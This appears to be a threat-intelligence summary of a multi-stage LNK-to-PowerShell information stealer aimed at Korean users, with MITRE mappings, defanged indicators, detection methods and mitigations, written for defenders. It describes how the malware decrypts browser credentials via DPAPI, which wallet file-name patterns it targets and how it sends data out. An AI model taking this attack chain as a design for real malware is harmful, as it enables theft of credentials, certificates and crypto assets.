Full Report
AhnLab SEcurity intelligence Center (ASEC) recently discovered a malicious LNK file being distributed to Korean users for the purpose of stealing user information. This type of malware collects various valuable data for threat actors, such as data related to virtual assets, browsers, public certificates, and email files, and it also performs keylogging. The confirmed malicious […]
Analysis Summary
# Tool/Technique: Malicious LNK File Information Stealer Chain
## Overview
A multi-stage attack initiated by a malicious LNK file disguised as a user notification (e.g., "Local Tax Bill.pdf.lnk"). The primary goal is information theft, targeting user data, virtual asset information, browser credentials, and public certificates, with simultaneous keylogging activity.
## Technical Details
- Type: Malware Chain (LNK leading to HTA, PowerShell, and VBScript)
- Platform: Windows
- Capabilities: Information stealing, keylogging, persistence establishment, data exfiltration.
- First Seen: April 22, 2025 (based on report date)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1204.002 - User Execution: Malicious File
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Base64 PowerShell)
- TA0008 - Lateral Movement (Implied via certificate theft/data access)
- TA0009 - Collection
- T1005 - Data from Local System
- T1056.001 - Input Capture: Keylogging
- T1555.003 - Credentials from Web Browsers
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
- TA0003 - Persistence
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
## Functionality
### Core Capabilities
The attack chain involves a specific sequence:
1. **Initial Execution:** User executes a disguised LNK file (e.g., `Local Tax Bill.pdf.lnk`).
2. **Staging:** The LNK downloads and executes an HTA file from the attacker server into the `%temp%` folder.
3. **Payload Delivery:** The HTA file contains a compressed ZIP archive, which includes bait documents (PDFs) and malicious scripts: `1.log`, `2.log`, `1.ps1` (PowerShell scripts), and `1.vbs`.
4. **Information Collection (`1.log` PowerShell):** Collects system information, browser data (Edge, Chrome, Naver Whale, Firefox), cryptocurrency wallet data, and public/government certificates (GPKI, NPKI). It also gathers recently accessed files and shortcut targets.
5. **Keylogging (`2.log` PowerShell):** Captures keystrokes and clipboard data.
6. **Persistence:** Establishes persistence via Run Key registration.
7. **Exfiltration:** Compresses collected data and uploads it to the attacker server using the `UploadFile` function.
### Advanced Features
- **DPAPI Decryption:** Ability to decrypt and collect encrypted browser information utilizing the Data Protection API (DPAPI).
- **Targeted Certificate Theft:** Specifically targets credentials and public certificates related to Korean systems (e.g., Naver Whale browser data, GPKI/NPKI certificates).
- **File Targeting:** Specific file name patterns related to cryptocurrency wallets (`wallet`, `keystore`, `privatekey`, `metamask`, etc.) are targeted for collection.
- **Command and Control:** Incorporates a `Work` function to periodically communicate with the C2 server to receive further instructions (download/upload files, run commands).
## Indicators of Compromise
- File Hashes:
- MD5: `1b90eff0b4f54da72b19195489c3af6c`, `1d64508b384e928046887dd9cb32c2ac`, `af576449b207c0f84501863351d3b1fa`
- File Names:
- LNK: `Local Tax Bill.pdf.lnk`, `Public Disclosure of Sex Offender Information.pdf.lnk`
- Embedded Payload: `1.log` (PowerShell), `2.log` (PowerShell), `1.ps1`, `1.vbs`
- Registry Keys: Implied addition to Run Keys for persistence.
- Network Indicators:
- Distribution URL: `hxxps://nid-naveroup[.]servepics[.]com/docs/revenue[.]zip`
- Download URLs: `hxxps://cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/prevenue[.]hta`, `hxxps://cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw[.]hta`, `hxxps://cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/wsoj[.]hta`, `hxxps://nid-naveroup[.]servepics[.]com/docs/revenue[.]zip`
- Behavioral Indicators: Execution chain starting from LNK, HTA execution in temp folder, PowerShell scripts utilizing Base64 decoding, persistence established via Run keys, large data uploads following collection routines.
## Associated Threat Actors
- Not explicitly named, but the heavy focus on Korean-specific targets (Naver Whale browser, GPKI/NPKI certificates, Korean language comments in scripts) strongly suggests a threat group targeting South Korean entities or individuals.
## Detection Methods
- Signature-based detection: IoCs (hashes, URLs).
- Behavioral detection: Monitoring LNK execution leading to the download and execution/decoding of PowerShell scripts from temporary directories, observation of DPAPI access attempts, and monitoring for sudden large data uploads after data collection processes complete.
- YARA rules: Likely applicable to the Base64 encoded PowerShell scripts (`1.log`, `2.log`) based on function names (`Unprotect-Data`, `GetExWFile`, `RegisterTask`).
## Mitigation Strategies
- **User Education:** Training users to recognize and avoid executing suspicious LNK files, especially those disguised as official documents.
- **Application Control:** Restrict the execution of HTA and PowerShell, especially from temporary directories.
- **Network Monitoring:** Block access to the listed distribution and C2 domains.
- **Endpoint Hardening:** Ensure robust credential protection mechanisms are in place beyond standard storage locations.
- **Certificate Management:** Monitor for unusual attempts to export or utilize system or user certificates (GPKI/NPKI).
## Related Tools/Techniques
- General LNK phishing vectors.
- Credential Stealers targeting web browser databases (e.g., Mimikatz patterns for DPAPI usage implicitly).
- PowerShell information stealers utilizing file system enumeration and obfuscation.